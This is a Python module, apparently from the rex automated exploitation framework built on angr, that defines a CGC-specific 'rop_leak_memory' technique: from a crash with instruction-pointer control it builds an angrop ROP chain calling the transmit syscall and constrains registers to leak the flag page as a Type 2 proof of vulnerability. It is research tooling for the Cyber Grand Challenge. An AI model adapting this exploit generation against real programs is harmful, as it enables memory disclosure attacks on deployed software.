import angrop
import logging
import claripy
from rex import Vulnerability
from rex.exploit import CannotExploit
from rex.exploit.cgc import CGCType2RopExploit
from ..technique import Technique

l = logging.getLogger("rex.exploit.techniques.rop_leak_memory")

class RopLeakMemory(Technique):
    '''
    Very CGC specific leaking technique
    '''

    name = "rop_leak_memory"

    applicable_to = ['cgc']

    # this technique should create an exploit which is a type2 pov
    pov_type = 2

    generates_pov = True

    @staticmethod
    def _get_writable_pages(state):
        last_addr = -1
        curr_start = -1
        ranges = []
        for page_num, page in sorted(state.memory._pages.items(), key=lambda x:x[0]):
            if not state.solver.eval(page.permissions) & 0x2:
                continue
            page_addr = page_num*0x1000
            if page_addr != last_addr:
                if last_addr != -1:
                    ranges.append((curr_start, last_addr))
                curr_start = page_addr
            last_addr = page_addr + 0x1000
        if last_addr != -1:
            ranges.append((curr_start, last_addr))
        return ranges


    def _get_circumstantial_constraints(self, state, rop_uncontrolled):
        # for those registers which are uncontrolled by rop, can we control it
        # circumstantially?

        constraints = [ ]
        for register in rop_uncontrolled:
            # if it's eax we can't control with rop, make sure it can be 2
            if register == "eax":
                constraints.append(state.regs.eax == 2)
            # if it's ebx we need to make sure it can stdout
            if register == "ebx":
                constraints.append(state.regs.ebx == 1)
            if register == "ecx":
                constraints.append(state.regs.ecx >= 0x4347c000)
                constraints.append(state.regs.ecx <= (0x4347d000 - 4))
            # if it's edx, we need to be able to set it to just above 4 bytes
            if register == "edx":
                constraints.append(state.regs.edx > 0x4)
            # if it's esi, we need to point to NULL or a writable page
            # TODO support setting to a writable page
            if register == "esi":
                or_cons = [ ]
                for page_start, page_end in self._get_writable_pages(state):
                    or_cons.append(claripy.And(state.regs.esi >= page_start, state.regs.esi <= (page_end - 4)))

                combine_cons = or_cons[0]
                for con in or_cons[1:]:
                    combine_cons = claripy.Or(combine_cons, con)

                constraints.append(combine_cons)

        return constraints

    def check(self):

        if self.rop is None:
            self.check_fail_reason("No rop available.")
            return False

        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        return True


    def apply(self, **kwargs):

        state = self.crash.state
        need_control = ['eax', 'ebx', 'ecx', 'edx', 'esi']
        rop_uncontrolled = [ ]
        # any one of these we can't control with rop?
        for register in need_control:
            try:
                self.rop.set_regs(**{register: 0x41414141})
            except angrop.errors.RopException:
                l.debug("unable to set register %s with rop in leaker", register)
                rop_uncontrolled.append(register)

        constraints = self._get_circumstantial_constraints(state,
                rop_uncontrolled)

        if not state.satisfiable(extra_constraints=constraints):
            raise CannotExploit("circumstantial constraints generated were unsatisfactory for a rop leaker")

        address_var = claripy.BVS('address_var', self.crash.project.arch.bits, explicit_name=True)
        length_var = claripy.BVS('length_var', self.crash.project.arch.bits, explicit_name=True)
        chain = self.rop.do_syscall(2, [1, address_var, length_var, 0x0],
                ignore_registers=rop_uncontrolled)

        chain, chain_addr = self._ip_overwrite_with_chain(chain)

        ccp = self.crash.copy()

        # add the constraints introduced by rop
        ccp.state.solver.add(*chain._blank_state.solver.constraints)

        chain_bv = chain.payload_bv()

        ch_sym_mem = ccp.state.memory.load(chain_addr, len(chain_bv)//8)
        ccp.state.add_constraints(ch_sym_mem == chain_bv)

        # windup and add constraints
        new_st = self._windup_to_syscall(ccp.state)

        constraints = self._get_circumstantial_constraints(new_st, rop_uncontrolled)
        for con in constraints:
            new_st.add_constraints(con)

        ccp.state = new_st

        return CGCType2RopExploit(ccp, ch_sym_mem, address_var, length_var)
